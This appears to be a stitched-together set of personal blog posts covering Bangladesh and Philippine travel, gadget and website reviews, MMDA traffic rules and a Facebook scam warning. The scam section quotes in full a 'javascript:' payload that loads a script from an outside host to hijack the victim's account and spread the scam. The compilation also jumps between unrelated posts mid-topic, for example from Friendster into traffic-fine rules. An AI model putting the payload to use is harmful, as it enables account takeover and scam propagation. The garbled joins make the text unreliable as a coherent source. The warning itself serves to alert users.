Location: 22° 21' 28.13" N, 91° 49' 18.67" E
Peninsula hotel is one of the best hotels in Chittagong. Location is very tourist friendly. Wellmart, a local grocery, is just across the street where you can buy some fresh fruits and sodas. Their rooms are spacious as well as the bathrooms. Amenities provided is a gym at the top floor, a small swimming pool, a health club/spa and a disco at the second floor.
One of the grimaces is that their internet service comes with a fee. Whether wire or wireless, you have to secure a username and password card from the reception. Another is that the music of the disco on the second floor is audible in the rooms even my room is more than 4 floors higher than the disco. I think the sound travels trough the ventilation system.
What I liked most in this hotel is the affordable and delicious food that they serve. Customer service is also commendable. Food that I order for in-room dining comes without delay and served with a smile. I enjoyed my stay here. Take a look at their website for booking information and rates.

PLACES TO VISIT
As traffic jams is very common in Bangladesh, getting around by public transportation is very hard and nearly impossible for tourists. It is practical to get a car for hire through your hotel reception or tourism desk. As they are driving on the left and driving condition is extreme, most car for hire comes with their own driver.
One thing you can also enjoy is a little stroll around your hotel. But take the usual precaution applicable to all places, don't wear flashy and expensive jewelries. Try to blend in with the local environment.

Lok Shilpa Jadughar (Folk Art and Craft Museum)
This is in old sonargaon in Dhaka. It is originally called Bara Sardar Bari and was built in 1901. On March 12 of 1975, it was established as a folk art and craft museum by Bangladeshi painter named Joynul Abedin.

Bangladesh Taj Mahal
Location: 23° 44′ 46″ N, 90° 34′ 03″ E
The site is just about 30 kilometers northeast of Dhaka. This is an exact replica of the Taj Mahal located in India. Although this is just a copy, it is claimed to be made with the same granite and marbles used with the original. Ahsanullah Moni, a wealthy Bangladeshi filmmaker, has hired architects and sent them to India to measure the original and recreate it with the same measurements.

Sixty Dome Mosque
Location: 22° 39′ 8″ N, 89° 47′ 5″ E
This is most commonly known as Shait Gambuj Mosque or Saith Gunbad Masjid. It is the largest historical mosque in Bangladesh. Actually the number of domes in the mosque is 81. It's seventy seven low domes that is arranged in seven rows of eleven and four more domes that is the roof of the four towers located in each corner. According to our guide the name might actually came from the number of pillars inside the mosque. There are exactly sixty pillars that forms arches that support the roof.
The Bagerhat Museum is also nearby the site of this mosque so you can enjoy two places in one stop. This site is about five kilometers from the main town of Bagerhat and located in Khulna Division.

Sundarban
Location: 21° 56′ 0″ N, 88° 51′ 0″ E
Sundarban is the world's largest block of tidal halophytic mangrove forest. This is a UNESCO world heritage site that is covering parts of India and Bangladesh. Two thirds of this site is in Bangladesh territory while the remaining one third is in India. The site is a national park and a tiger reserve at the same time. That is why this also the largest reserve for the Bengal tiger.

MASBATE PROVINCE IN BRIEF

Masbate is an island province of the Philippines that is located in the Bicol Region. It is composed of three major islands: Masbate, Ticao and Burias. The lone city, Masbate City is located in the Masbate Island. The island of Masbate lies at the center of the Philippine archipelago between latitudes 11°43’ north and 123°09’ east and 124°5’ east. The boundaries are Ticao Pass on the north, San Bernardino Strait on the east, Visayan Sea on the south, and the Sibuyan Sea on the west.

The general topographic feature of the province ranges from slightly undulating to rolling and from hilly to mountainous. With each island, the rugged topography is concentrated in the northeastern portion and gradually recedes to blunt hills and rolling areas in the southeast, southwest, and south.

HOW TO GET THERE

There are so many options on how to reach masbate. You can travel by land, by sea or by air from different points of the country.

By Land

There's a daily trip going to masbate via RORO bus which is a part of the nautical highway program of the government. The terminal of this bus is located at cubao in metro manila. The bus will travel to Pilar, Sorsogon via national highway and then will be carried by the RORO boat from Pilar port to Masbate city port. At the time of this writing, the fare is is just 1,050 pesos one way for aircon buses and 800pesos for one way for ordinary buses with the RORO boat fare inclusive. These RORO buses also travel out from Masbate City to other towns such as Aroroy and Mobo.

By Sea

Just in case you don't prefer the RORO bus, you still have other option. You can also ride another bus that travels daily from Manila to Pilar, the board the RORO boat going to Masbate or better yet take the fastcraft operated by Montenegro Lines. The fastcraft is convenient and faster than the RORO boat but of course the fare is higher. Montenegro lines fastcraft schedules from Pilar to Masbate City are 8:00am, 11:30am and 3:30pm. Montenegro lines fastcraft schedules from Masbate to Pilar are 5:00am, 8:00am and 12:00 noon. These schedules may change, please verify with Montenegro lines. Ferries also travels from Cebu City going to Masbate City port or Cataingan Port.

By Air

This is by far the most convenient means of going to Masbate. The airport is now operational again after being closed for some time due to renovation and facility improvement. ZestAir and Air Philippines has daily flights going to Masbate City airport from Manila and vice versa. Flights schedule to Masbate and vice versa are shown below.

ATTRACTIONS

Rodeo Masbateño Festival

This is an annual event which takes place in Masbate City which showcases the peoples natural skills in livestock handling, such as lassoing, wrestling, and riding cattle. Also included in the event are a fair featuring local products and exhibitions, livestock shows, animal health seminars and trade of cattle and horses. The event has taken place every summer since 1993 which usually opens with a lively parade of horseback riders.

The highlight of the event is the rodeo competition itself. Both men and women dress up in cowboy outfits to perform stunts like lassoing on foot and on horseback, bull riding and whipping, the two-person carambola, livestock wrestling, casting down, load carrying, and other activities that is related to the handling of livestock. These events draw tourists from the rest of the Philippines and also from around the world as well as local expectators. Cowboys and bull riders of other nationalities also participate in the competitions.

Talking to Machines

BACKGROUND

Today people are fascinated by the artificial intelligence of the machines that enable them to interact with people trying to mimic as close as possible the human's reactions and providing near logical responses to conversations with them. This artificial intelligence has already been put into good use by Apple when they introduced Siri. I know most people nowadays of who or what is Siri. So let me introduce you to two more AI that will let you talk to machines, cleverbot and Evie.

CLEVERBOT
Cleverbot's homepage.

Cleverbot is a web service which allows you to talk to a computer program. The program tries to learn from the context of the words you are giving it and provide you with a response that will seem like a you are actually chatting to a human. Unlike Siri, the service is at the time of this writing limited to conversational purposes and plain fun.

Cleverbot can even answer Filipino statements.

The interface is very simple. Just type your statement on the textbox then hit enter or click "Think about it!". You can also make cleverbot talk for you by pressing "Think for me!. The chat stream is only visible for up to four lines so if you want to review everything you have talked about, click "Thoughts so far" to see the chat log.

BACKGROUND

Everyone has experienced it, sometime in your life you misplace your things. Sometimes it also happens that people get extra "curious" with your stuff and get hold of them. In these days of iPod and iPhone popularity most people would not like it if their gadget goes MIA. Gladly Apple has a nifty solution for this. They have a built in app inside these gadgets that will enable you to track them somehow and also remotely perform some actions on them.

REQUIREMENTS
• iPod/iPhone runs iOS 5.0 or higher

If not you can update your device first. Just connect your device to your Mac or PC and follow the onscreen instructions in iTunes. This update also requires that your iTunes is version 10.5 or higher. So if it's not, you need to update your iTunes first.

• iCloud turned on and properly set up

On your iOS device, go to settings then choose iCloud. Create and set up your iCloud account. Make sure that Find My iPod/iPhone is set to on.

USER REVIEW

I tried to locate my device by using my PC. I point my browser to iCloud.com then logged in with my iTunes account. After authentication, I clicked on the Find My iPhone icon. And there, my device appeared on a map powered by Google.

Geographic location of the device

I would say that this location report is quite accurate to about 15 meter radius as I have tried the location tracking for many times. But this of course will depend on your location. As I am in the city with many cellsites near my location so the accuracy of the triangulation calculation is high.

Clicking the icon on the map will show a pop up options to perform remote actions on your device. You have the choice to send a message and optionally play a sound in full volume, remotely lock the device or conduct a remote wipe. Choosing to lock will just lock your device using your current lock key. Remote wipe will restore the device to factory settings and delete all your confidential data in the process.This is useful if you have sensitive information on your device that should not fall into the hands of unauthorized person or competitor.

Actions that can be performed remotely

I choose the option to send a message and play sound on my device. The response was immediate. The message appear on my device with the label "Important Message" and my device plays a tone that sounds like a locator beacon for two minutes. If you just choose to play a sound without a message an alert will appear on the device with the label "Find My iPod touch Alert". This play sound option will be very useful if you just misplace your device and its in silent mode so the old technique of calling it from another phone will not work. One downside is that if your device is already on the hands of someone else its very easy to stop the sound. Momentarily pressing the power button will stop the tone even without unlocking the device.

Miles Cyrus Facebook Scam

BACKGROUND

If you see your wall or your news stream on Facebook filled with so many update from friends about a so called Miles Cyrus video it means that your friends has been a victim of this new widget exploit on Facebook. Please resist the temptation to follow the link unless you want to be victimized also. I hope this will be brought to Facebook authorities' attention so that they can stop this immediately.

DETAILS

Seeing this stream of posts of your friends on your wall might spark your interest to follow the links. But for the exprerienced eyes (or kind of paranoid) this looks suspicious. As you can see two of them have the same caption word for word and even capitalization.

So just to prove my doubts on this post I decided to follow the link. After clicking the link, I was redirected to a fanpage with an embedded video that I was supposed to verify that I am above 18. At this point I'm now convinced that there was something fishy with this. That is because for all I know, Facebook does not allow mature content on their site as what their Terms and Conditions states. (Yeah I bothered to read all of that).

To see what this widget is up to, I clicked the continue button to verify that I am above 18. After clicking continue, I was given a set of instructions, It says click the address bar, type j and then press Ctrl+V. Say what? Ctrl+V? As I am quite fond of using keyboard shortcut, I am well aware that it is a shortcut for pasting something. This widget is really up to something not good. Imagine, the widget has an access to your clipboard.

I did what I was instructed, click the address bar (that selects all that was written in there), type J (overwrites whatever address you have in there) and then press Ctrl+V (pastes something to your address bar appended to the "J"). In this case the appended text to "J" was "avascript:(a=(b=document).createElement('script')).src='http://saudau.vn/1/ro.js',b.body.appendChild(a);void(0)" So this line clearly shows that you are about to execute an offsite javascript when you press Enter which is also part of the instruction. After you follow all this instructions you will be shown a dead end page saying that there are no surveys available for your country. So this is really about surveys and not about the video. But wait, there's more. The widget has more payload in the offsite javascript. The script will also post in the walls of random people on your friends list. So it was also trying to spread itself by using the trust you have with your friends. I have accessed the JavaScript code this scam is executing and I have found out that it is using five fake myles cyrus fanpage with the same malicious content. The fanpage id of these pages are 188909304525633, 180090332077859, 234590593270237, 188127947936748 and 136489769788481. Spread the word to your friends and report this to Facebook authorities so that they can stop this malicious widget.

Bukidnon is located in Northern Mindanao of the Philippines. It is a landlocked province with Malaybalay City as its capital. HOW TO GET THERE

Refer to my post on how to get to Cagayan De Oro City, then from there land travel to Manolo Fortich, Bukidnon, particularly Dahilayan Adventure Park, is about two to three hours drive from Cagayan De Oro City proper. Public transport to Dahilayan is not so easy so it is practical to rent a car to go to Dahilayan.

The start point of this zipline is located at 4500 feet above sea level. If you are not comfortable with the adrenaline rush this longest zipline offers, you can also try the 320 meters plus 120 meters zipline. BACKGROUND

The MMDA has harnessed the power of new technology in delivering real time traffic updates to the general public. It has started with twitter updates and now, in partnership with TV5 interaksyon website, MMDA launches its BETA testing TV5-MMDA traffic monitoring system. Another milestone in MMDA's mission to provide service to the FIlipino people.

USER REVIEW

The website is satisfactory although it is still in BETA testing as stated by the tweet of MMDA's official twitter account. "MMDA [REMINDER] Please check out our beta website http://mmda.gov.ph/navigator for traffic updates #mmda".

The traffic update is available in three views: System View, Line View and Google Map View. In system view, you can have a rough overview of the traffic situation on the entire jurisdiction of MMDA. The color coded legend shows if the area has light traffic, moderate traffic or heavy traffic. And if for some reason the site's situation is not available it will also show as such. The color coded nodes on the System View is also clickable that will show a pop up information on the location, north and south bound situation and also the time of the last update.

The line view basically gives the same information but it is presented in table form. The traffic situation for northbound and southbound is also presented by the same color code and last update is also provided.

The google map view is also the same with the system view, only that it is presented as a map overlay of the google map. It is very helpful if you want to plan the fastest route to a place you want to go.

The idea behind Stolen Camera Finder is that when your camera has been lost or stolen, it will eventually used to take a picture (of course..) and that picture could be uploaded somewhere on the world wide web. This site will search the web for pictures matching the serial number of the camera that you provided or by directly extracting the serial number from the exif data of your previously taken photos.

USER REVIEW

The sites feature that generally get my attention is the very simple user interface. You will just need to drag and drop your picture and the site will automatically get the serial number from the exif data. Then they will search the web for photos with matching serial number in the exif data.

The only downside is that the drag and drop feature only works on chrome and firefox. So the IE version of the site only relies on the serial number that you will input. The fun part comes with using the site in chrome or firefox. This is because the site dont just get the serial number from the photo's exif data but gather all information within. Then the site enables you to view the exif details of that photo. For all the photography enthusiasts out there, this is quite useful if you want to see the details of certain photos to recreate the shot.

This happens to most things invented, at some time they are at their peak but time will come that something new will replace it's place. Remember the days of the casette tapes? Now they are gone. Same thing is happening to the pioneer social networking site Friendster. After its launch in 2002, Friendster has become a fad and attracted millions of user all over the world. The above-mentioned administrative violations also require a minimum of 2 hours seminar (for the drivers) at the Traffic Academy. However, any driver who has committed three (3) or more unpaid violations, whether administrative or moving, shall also be subject to attending seminars, whose length shall be based on the results of the diagnostic exam (exam that will determine the contents of the seminar progress), which will be administered by the Agency.*Note: If the license is to be confiscated, the Traffic Enforcer should inform the driver of the reason/s for the confiscation and the ticket validity. If the driver refuses to surrender his driver's license, his plate may be detached pursuant to Section 74 & 75, MC 89-105.

Private Vehicles are not allowed to use the yellow lane except when they are about to turn - provided that they start shifting lanes upon seeing the transition lane (broken white lines painted diagonally), that you can see around 50 meters away from an intersection. However, selective apprehension of private vehicles using the yellow lane is highly prohibited.
The yellow lanes (1st and 2nd lanes in EDSA) are only for City Buses. City Buses are not allowed to go beyond the yellow lanes. If they do so, they will be apprehended for violating the yellow lane policy.
Provincial buses are also not allowed to use the yellow lane. Instead, they are encouraged to use the third lane.
Each Traffic Enforcer has his/her own written mission order issued by the MMDA Central Admin. Apprehended drivers are free to ask for the apprehending officer's mission order, which includes his area of responsibility, time of duty, official function. It also indicates whether or not the enforcer is authorized to issue tickets.
Traffic Enforcers should issue TVR in complete uniform, with visible nameplates. Traffic Enforcers are instructed to accomplish the TVR (Traffic Violation Receipt) without any delay or argument on the road, so as to avoid traffic congestion.
The Apprehending Enforcer is allowed to issue another TVR for Towing Fee. If the owner of the impounded vehicle fails to release his vehicle after payment of fine in the stipulated date, the impounding officer shall issue a separate TVR indicating no. of days it has remained at the impounding area.
Before apprehending, the Traffic Enforcer should flag down the vehicle and lead it to the roadside where it will not obstruct the flow of traffic. Traffic Enforcers should courteously inform the driver of his violation.
Traffic Enforcers are not allowed to ask drivers to alight from their vehicles while the apprehension is taking place. Most importantly, Traffic Enforcers are not allowed to ask or receive bribe money.
During traffic apprehensions, the following can be considered as a valid driver's license:

ID Plastic Card
DLR / Temporary Driver's License
TOP (Temporary Operator's Permit)
International Driver's License
Foreign License

The Traffic Enforcer should exercise extra diligence in verifying the veracity of the data or documents presented.

If you encounter any Traffic Enforcer violating any of these, get the name of the Traffic Enforcer indicated on his/her name plate, and submit a letter of complaint addressed to the Traffic Adjudication Board (TAB), MMDA Bldg. EDSA cor. Orense St. Guadalupe Nuevo, Makati City, within 5 days after the apprehension.

In case you are involved in an argument with a Traffic Enforcer, call the MMDA Hotline 136, or the Metrobase at +639175618711. Ask the Metrobase to send inspectors to go to the place where the argument is taking place for proper investigation.

You may also e-mail complaints against erring Traffic Enforcers to the MMDA thru email@mmda.gov.ph. Include full details of the incident (attach photos or videos if possible), so that they will be able to act promptly on the matter.

Pros:

Very tough and durable bag. This is the very first bag that survived me for a year. I've been using it for more than a year now but its still in good condition. The average lifespan of my previous bags is less than six months.
I love the removable laptop sleeve. For a guy like me that is always on the move, its been a comfort to just slip out the sleeve just in case I dont want to bring along my laptop.
The removable organizer panel keeps your small gadgets and flash drives handy.
The anti-theft features really give me a peace of mind while travelling. The cable reinforced shoulder strap can be attached to an airport bench or a bus stations' chair while waiting to board. This prevents someone to just pick up your bag and walk or run away.

Uugong Park

During the early 60's-early 80's Uugong park was known for its beautiful waterfalls. It is a usual summer picnic location for families and friends. Uugong means echo, which has been derived from the loud echo or sound produced by the strong current flow of the falls.

Uugong Park now has a resort made and owned by a local artist named Rafael Pacheco, who is known not only locally but internationally because of his paintings in which he uses his fingers instead of paintbrush. Today, the resort does not use the old falls anymore. Two pools were made inside the resort where you can still view the now dead waterfalls and its river. The new Uugong resort features the displayed collection of paintings and sculptures of Mr. Pacheco.

I have been playing neopets for eight and a half years now. So far I have three painted neopets, one christmas shoyru, one sponge acara and one disco elephante that I always bring to daily trips to the lab ray in hopes of getting a much rare color. I have also collected 234 avatars, 40 stamps, 3 keyquest tokens, 206 neodeck cards, 11 site themes, 23 site event trophies, 3 site feature trophies, and 8 game trophies. I have also garnered 465 out of 531 battledome wins. I have put up a size 24 shop, size 10 gallery and a neohome. I am currently a member of nothingbutneopets guild. So that will give you a rough idea of the many things that you can do on neopets.

What I love on this site is that users of all ages are welcome to use their service. The user environment is also very very child friendly. The site policy is concrete about children's safety. Swear words are blocked on the site's forum (neoboards) boards. And best of all, the site's service is free of charge. Their income come from advertisements but the site's ads are unobtrusive. They also have a very clever sponsored games, wherein the games are featuring the product that they are advertising.

If you want to know if your password is secure enough, this website will give you a rough idea. HowSecureIsMyPassword will calculate your password strength and present it in terms of time it will take a desktop PC to hack your password using the brute force method.

USER REVIEW

HowSecureIsMyPassword uses JavaScript to calculate the password strength. Because javascript is a client side script (calculation/operation are done on your local PC and not on the website's server), it is safe to use since the password string will not be transmitted. But if you are very cautious, you can also disconect your internet connection after loading the page. Then do your calculations on their page while offline. After you are done, clear your browser's cache and cookies before reconnecting to the internet.

The calculations' result is accurate although in real brute force attack of your password, many factors will affect the time it will take. This involves the computing power of the PC used for the attack and the type of account the password is used for. Many online accounts has maximum attempt limits and will lockout the account for the day after such number of failed attempts.
